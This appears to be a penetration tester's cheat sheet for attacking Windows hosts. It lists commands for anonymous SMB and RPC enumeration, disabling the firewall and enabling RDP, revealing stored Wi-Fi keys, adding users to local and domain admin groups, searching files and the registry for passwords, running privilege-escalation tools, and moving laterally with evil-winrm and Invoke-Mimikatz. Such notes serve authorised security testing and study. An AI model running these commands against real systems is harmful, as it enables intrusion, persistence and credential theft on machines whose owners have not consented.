Windows


# Anonymous users can obtain the Windows password policy

msf > use auxiliary/scanner/smb/smb_enumusers 
------------------------------------------------------------------------------------------------------------------------------------------------------

# CIFS NULL Session Permitted

enum4linux -a <target IP>

nbtscan <target IP>

rpcclient -U "" <target IP>
Enter  's password: <return>
rpcclient $> 
srvinfo
enumdomusers
queryuser <user>
netshareenum
netshareenumall
querydominfo
getdompwinfo

net use \\target IP\ipc$ "" /u:""
------------------------------------------------------------------------------------------------------------------------------------------------------

# CIFS Share Writable By Everyone

Places > Network > Browse Network

------------------------------------------------------------------------------------------------------------------------------------------------------

# Firewall

netsh firewall show state
netsh firewall show config

netsh firewall add portopening TCP 3389 RDP
netsh firewall set opmode disable                 Disable firewall

netsh wlan show interfaces
netsh wlan show drivers
netsh wlan show networks
netsh wlan show profiles
netsh wlan show profiles name="name"
show profiles name="name" key=clear

- Open RDP in the firewall, start the service and login

reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
netsh firewall set opmode disable
sc config termservice start= auto

rdesktop -u <user> -p <password> <target IP>
rdesktop -u <user> -p <password> -g 1440x900 <target IP>         Set a larger window size than the default
rdesktop -u <user> -p <password> -g 85% <target IP>              Set a smaller window size using a percentage of the default
rdesktop -u <user> -p <password> -g 85% -r disk:share=/root/     <target IP>

ctrl + alt + enter                                               Toggle full screen mode
------------------------------------------------------------------------------------------------------------------------------------------------------

# NetBIOS and SMB

smbmap -H <target IP>                             Check for access to open shares

enum -G <target IP>
enum -P <target IP>

nbtenum -r <target IP>
nbtenum -q <target IP>

nbtscan -r <target range>
nbtscan -f hosts.txt
------------------------------------------------------------------------------------------------------------------------------------------------------

# OS Versions

Windows NT 4                                      4.0
Windows 2000                                      5.0
Windows XP                                        5.1
Windows Server 2003, 2003 R2                      5.2
Windows Vista, Server 2008                        6.0
Windows 7, Server 2008 R2                         6.1
Windows 8, Server 2012                            6.2
Windows 8.1, Server 2012 R2                       6.3
Windows 10, Server 2016, Server 2019              10.0

PS C:\> Get-WmiObject -Class win32_OperatingSystem | select version, buildnumber
------------------------------------------------------------------------------------------------------------------------------------------------------

# Services

PS C:\> Get-Service | ? {$_.Status -eq "Running"} | select -First 2 |fl
------------------------------------------------------------------------------------------------------------------------------------------------------

# SMB Open File Shares

- Anonymous
smbclient -L <target IP>                          List shares
smbclient //<target IP>/<share>                   Connect to a share
smb: \> dir                                       List directory contents
smb: \> more file.txt                             Read a file
smb: \> get file.txt                              Download a file
smb: \> put file.txt                              Upload a file

- Using credentials
smbclient //<target IP>/<share> -U <user>
------------------------------------------------------------------------------------------------------------------------------------------------------

# User Accounts

- Local
net users                                         Local users
net user <current user>                           Show info on a local user
net accounts                                      Local password policy
net config workstation
net localgroup                                    Local Security Groups
net localgroup Administrators                     Users in the local Administrators Security Group
net localgroup "Remote Desktop Users"             Users in the local Remote Desktop Users Security Group

net user <user> <password> /add                   Add a local user
net localgroup Administrators <user> /add         Add new user to the Administrators Security Group

net view                                          Computers in the users domain and other domains
net view /domain                                  Computers in other domain

- Domain
net accounts /domain                              Domain password policy
net user /domain                                  Show domain users
net user <user> /domain                           Show info on a domain user
net group /domain
net group "domain admins" /domain                 Show domain admin
net group "domain users" /domain                  Show domain users
net group "domain controllers" /domain            Show domain controllers
nltest /domain_trusts                             Show domain trusts

net localgroup Administrators /domain             Users in the domain Administrators Security Group
net localgroup /domain                            Domain Security Groups

net user <user> <password> /add /domain           Add a user to the domain
net group "Domain Admins" <user> /add /domain     Add a user to a specific Security Group on the domain
------------------------------------------------------------------------------------------------------------------------------------------------------
------------------------------------------------------------------------------------------------------------------------------------------------------

# Enumerate using a low level account

hostname
whoami
whoami /groups
systeminfo                                        Show system info, hot fixes, and domain name
net share                                         Shared folders
net users                                         Local users
net localgroup Administrators                     Local administrators

ipconfig /all
route print
arp -a
netstat -ano | findstr "LISTEN"
netstat -ano | findstr "ESTABLISH

nltest /dclist:<domain>                           Show domain controllers
nltest /domain_trusts                             Show domain trusts

net group "domain admins" /domain
net group "enterprise admins" /domain
net group "Domain Computers" /domain

doskey /history                                   Show command history
gpresult /z

dir /s *pass* == *cred* == *vnc* == *.config*
findstr /si password *.ini *.pdf *.txt *.docx *.xlsx
reg query HKLM /f password /t REG_SZ /s
reg query HKCU /f password /t REG_SZ /s
------------------------------------------------------------------------------------------------------------------------------------------------------

# Privilege Escalation

OS configuration issues
software configuration issues
weak service permissions
weak file system permissions
DLL hijacking

PowerUp.ps1, Invoke-AllChecks

git clone https://github.com/GDSSecurity/Windows-Exploit-Suggester
cd Windows-Exploit-Suggester
pip install xlrd --upgrade
./windows-exploit-suggester.py --update (note the database file name)
systeminfo > win.txt                              Run this on the Windows target and d/l to attack VM
./windows-exploit-suggester.py --database 2020-01-18-mssb.xls --systeminfo win.txt

seatbelt.exe -group=system

watson.exe

winPEASx64.exe cmd
------------------------------------------------------------------------------------------------------------------------------------------------------

# Lateral Movement

- Windows Remote Management (WinRM)
nmap -Pn -n -T4 --open -p5985,5986 -sV <target IP>

msf > use auxiliary/scanner/winrm/winrm_auth_methods     Identify the WinRM authentication method

crackmapexec winrm <target IP> -u <user> -p <password> -x ipconfig

evil-winrm -i <target IP> -u <user> -p <password> -s /opt/Nishang/
menu
Gather/Invoke-Mimikatz.ps1
Invoke-Mimikatz
evil-winrm -i <target IP> -u <user> -H <hash>
